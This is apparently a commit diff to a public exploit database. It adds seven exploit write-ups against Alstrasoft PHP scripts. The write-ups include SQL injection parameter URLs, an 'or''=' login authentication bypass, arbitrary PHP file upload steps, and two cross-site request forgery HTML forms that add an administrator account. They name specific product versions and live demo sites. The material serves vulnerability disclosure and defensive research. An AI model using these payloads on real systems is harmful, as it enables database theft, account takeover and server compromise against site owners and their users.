DB: 2017-02-05

7 new exploits

Debian 9 ntfs-3g - Privilege Escalation
ntfs-3g (Debian 9) - Privilege Escalation
Alstrasoft EPay Enterprise 5.17 - SQL Injection
Alstrasoft ProTaxi Enterprise 3.5 - Arbitrary File Upload
Alstrasoft e-Friends 5.12 - SQL Injection
Alstrasoft Video Share Enterprise 4.72 - SQL Injection
Alstrasoft Flippa Clone MarketPlace Script 4.10 - Cross-Site Request Forgery (Add Admin)
Alstrasoft FMyLife Pro 1.02 - Cross-Site Request Forgery (Add Admin)
Alstrasoft Forum Pay Per Post Exchange Script 2.01 - SQL Injection

files.csv

@@ -8787,7 +8787,7 @@ id,file,description,date,author,platform,type,port
 41207,platforms/windows/local/41207.txt,"Viscosity 1.6.7 - Privilege Escalation",2017-01-31,"Kacper Szurek",windows,local,0
 41217,platforms/android/local/41217.txt,"Google Android - RKP EL1 Code Loading Bypass",2017-02-01,"Google Security Research",android,local,0
 41221,platforms/windows/local/41221.txt,"Ghostscript 9.20 - 'Filename' Command Execution",2017-02-02,hyp3rlinx,windows,local,0
-41240,platforms/linux/local/41240.sh,"Debian 9 ntfs-3g - Privilege Escalation",2017-02-03,"Kristian Erik Hermansen",linux,local,0
+41240,platforms/linux/local/41240.sh,"ntfs-3g (Debian 9) - Privilege Escalation",2017-02-03,"Kristian Erik Hermansen",linux,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -37169,3 +37169,10 @@ id,file,description,date,author,platform,type,port
 41235,platforms/php/webapps/41235.txt,"SlimarUSER Management 1.0 - 'id' Parameter SQL Injection",2017-02-03,"Kaan KAMIS",php,webapps,0
 41238,platforms/php/webapps/41238.txt,"Itech Multi Vendor Script 6.49 - SQL Injection",2017-02-03,Th3GundY,php,webapps,0
 41239,platforms/php/webapps/41239.txt,"Zoneminder 1.29 / 1.30 - Cross-Site Scripting / SQL Injection / Session Fixation / Cross-Site Request Forgery",2017-02-03,"Tim Herres",php,webapps,80
+41241,platforms/php/webapps/41241.txt,"Alstrasoft EPay Enterprise 5.17 - SQL Injection",2017-02-04,"Ihsan Sencan",php,webapps,0
+41242,platforms/php/webapps/41242.txt,"Alstrasoft ProTaxi Enterprise 3.5 - Arbitrary File Upload",2017-02-04,"Ihsan Sencan",php,webapps,0
+41243,platforms/php/webapps/41243.txt,"Alstrasoft e-Friends 5.12 - SQL Injection",2017-02-04,"Ihsan Sencan",php,webapps,0
+41244,platforms/php/webapps/41244.txt,"Alstrasoft Video Share Enterprise 4.72 - SQL Injection",2017-02-04,"Ihsan Sencan",php,webapps,0
+41245,platforms/php/webapps/41245.html,"Alstrasoft Flippa Clone MarketPlace Script 4.10 - Cross-Site Request Forgery (Add Admin)",2017-02-04,"Ihsan Sencan",php,webapps,0
+41246,platforms/php/webapps/41246.html,"Alstrasoft FMyLife Pro 1.02 - Cross-Site Request Forgery (Add Admin)",2017-02-04,"Ihsan Sencan",php,webapps,0
+41247,platforms/php/webapps/41247.txt,"Alstrasoft Forum Pay Per Post Exchange Script 2.01 - SQL Injection",2017-02-04,"Ihsan Sencan",php,webapps,0

platforms/php/webapps/41241.txt

@@ -0,0 +1,21 @@
+# # # # # 
+# Exploit Title: Alstrasoft EPay Enterprise v5.17 Script - SQL Injection
+# Google Dork: N/A
+# Date: 04.02.2017
+# Vendor Homepage: http://www.alstrasoft.com/
+# Software Buy: http://www.alstrasoft.com/epay_enterprise.htm
+# Demo: http://blizsoft.com/enterprise/
+# Version: 5.17
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/members/userinfo.htm?id=[SQL]
+# http://localhost/[PATH]/members/products.htm?id=[SQL]&action=update
+# http://localhost/[PATH]/members/subscriptions.htm?id=[SQL]&action=update
+# Authentication Bypass :
+# http://localhost/[PATH]/members/login.htm and set Username:'or''=' and Password to 'or''=' and hit enter.
+# # # # #

platforms/php/webapps/41242.txt

@@ -0,0 +1,23 @@
+# # # # # 
+# Exploit Title: Alstrasoft ProTaxi Enterprise v3.5 Script - Arbitrary File Upload
+# Google Dork: N/A
+# Date: 04.02.2017
+# Vendor Homepage: http://www.alstrasoft.com/
+# Software Buy: http://www.alstrasoft.com/protaxi-uber-clone.htm
+# Demo: http://propertycarrots.com/taxi/public/user/signin
+# Version: 3.5
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# Exploit :
+# Register as a passenger member.
+# http://localhost/[PATH]/public/user/signup
+# My Profile upload photo.php
+# http://localhost/[PATH]/public/user/profile
+# Right click on the photo to find the .php path.
+# http://localhost/[PATH]/public/uploads/....php
+# If you upload pictures again .php is deleted.
+# # # # #

platforms/php/webapps/41243.txt

@@ -0,0 +1,20 @@
+# # # # # 
+# Exploit Title: AlstraSoft E-Friends v5.12 Script - SQL Injection
+# Google Dork: N/A
+# Date: 04.02.2017
+# Vendor Homepage: http://www.alstrasoft.com/
+# Software Buy: http://www.alstrasoft.com/efriends.htm
+# Demo: http://alstrahost.com/friends/
+# Version: 5.12
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as regular user
+# http://localhost/[PATH]/index.php?mode=forums&act=viewcat&seid=[SQL]
+# http://localhost/[PATH]/index.php?mode=forums&act=viewforum&cats=[SQL]
+# http://localhost/[PATH]/index.php?mode=forums&act=viewforum&cats=131&seid=[SQL]
+# # # # #

platforms/php/webapps/41244.txt

@@ -0,0 +1,20 @@
+# # # # # 
+# Exploit Title: AlstraSoft Video Share Enterprise v4.72 Script - SQL Injection
+# Google Dork: N/A
+# Date: 04.02.2017
+# Vendor Homepage: http://www.alstrasoft.com/
+# Software Buy: http://www.alstrasoft.com/videoshare.htm
+# Demo: http://www.alstrahost.com/vs/
+# Version: 4.72
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/album.php?UID=[SQL]
+# http://localhost/[PATH]/uprofile.php?UID=[SQL]
+# http://localhost/[PATH]/gmembers.php?urlkey=[URLKEY]&gid=[SQL]
+# http://localhost/[PATH]/channel_detail.php?chid=[SQL]
+# # # # #

platforms/php/webapps/41245.html

@@ -0,0 +1,26 @@
+# # # # # 
+# Exploit Title: AlstraSoft Flippa Clone MarketPlace v4.10 Script - Cross-Site Request Forgery (Add Admin)
+# Google Dork: N/A
+# Date: 04.02.2017
+# Vendor Homepage: http://www.alstrasoft.com/
+# Software Buy: http://www.alstrasoft.com/flippa-clone-marketplace.htm
+# Demo: http://www.revou.com/flippa/
+# Version: 4.10
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SubAdmin Management [Add]:
+<html>
+<body>
+<form name="frmSubadmin" action="http://localhost/[PATH]/subadminadd.php" method="POST" >
+<td align="left" style="padding-left:15px" height="25" align="center">SubAdmin Management [Add]</td>
+<input type="text" name="user_login" size="40" maxlength="50" class="textbox" value="">
+<input type="password" name="user_passwd" size="40" maxlength="50" class="textbox"  value="">
+<input type="submit" name="Sumbit" value="Save" class="stdButton">
+</form>
+</body>
+</html>
+# # # # #

platforms/php/webapps/41246.html

@@ -0,0 +1,33 @@
+# # # # # 
+# Exploit Title: AlstraSoft FMyLife Pro v1.02 Script - Cross-Site Request Forgery (Add Admin)
+# Google Dork: N/A
+# Date: 04.02.2017
+# Vendor Homepage: http://www.alstrasoft.com/
+# Software Buy: http://www.alstrasoft.com/fmylife-pro.htm
+# Demo: http://www.tellaboutit.com/
+# Version: 1.02
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# Exploit :
+<html>
+<body>
+<h2>Add an Administrator</h2>
+<form action="http://localhost/[PATH]/admin/" method="post">
+<div id="add-admin-form">
+<input type="hidden" name="action" value="add-admin" />
+<label for="username">Username:</label>
+<input type="text" id="username" name="admin-username" value="" />
+<div class="spacer"></div>
+<label for="password">Password:</label>
+<input type="password" id="password" name="admin-password" value="" />
+<div class="spacer"></div>
+<input type="submit" name="Sumbit" name="add-admin" id="add-admin" value="Add Administrator" />
+</div>
+</form>
+</body>
+</html>
+# # # # #

platforms/php/webapps/41247.txt

@@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: AlstraSoft Forum Pay Per Post Exchange v2.01 Script - SQL Injection
+# Google Dork: N/A
+# Date: 04.02.2017
+# Vendor Homepage: http://www.alstrasoft.com/
+# Software Buy: http://www.alstrasoft.com/forum-pay-per-post-exchange.htm
+# Demo: http://blizsoft.com/forum/
+# Version: 2.01
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?menu=forum_catview&catid=[SQL]
+# # # # #